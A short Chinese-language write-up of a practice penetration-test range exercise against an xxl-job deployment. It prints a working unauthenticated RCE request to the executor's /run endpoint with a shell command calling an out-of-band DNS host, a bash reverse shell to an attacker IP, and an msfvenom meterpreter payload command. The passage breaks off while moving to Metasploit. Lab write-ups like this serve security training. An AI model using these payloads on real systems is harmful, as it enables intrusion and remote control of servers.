某一次靶场考核过程
本篇是老东家的某个月同事出的靶场渗透测试,都是常规操作,拿来练手提升基础熟练度非常合适 目录扫描发现: 访问发现报错信息: 根据java的包的报错,可以找到源代码,这里我问了chatgpt: 谷歌找到文档,翻到后台: http://192.168.10.70:8080/xxl-job-admin/toLogin 经过翻阅,发现有一个未授权的RCE,最新的那个SSRF进后台RCR的那个没搞出来,这个是老的: POST /run HTTP/1.1 Host: 192.168.10.70:9999 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.110 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close Content-Length: 521 { "jobId":1, "executorHandler":"demoJobHandler", "executorParams":"demoJobHandler", "executorBlockStrategy":"COVER_EARLY", "executorTimeout":0, "logId":1, "logDateTime":1586629003729, "glueType":"GLUE_SHELL", "glueSource":"ping ecujz4ok5rcfvx3kdd5turf0rrxil89x.oastify.com", "glueUpdatetime":1586629003727, "broadcastIndex":0, "broadcastTotal":0 } dns成功触发了: 接下来就是反弹shell, /bin/bash -i >& /dev/tcp/192.168.11.108/8888 0>&1 msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=192.168.11.108 LPORT=443 -f elf -o reverse.elf 为了维持住会话,上一下msf:...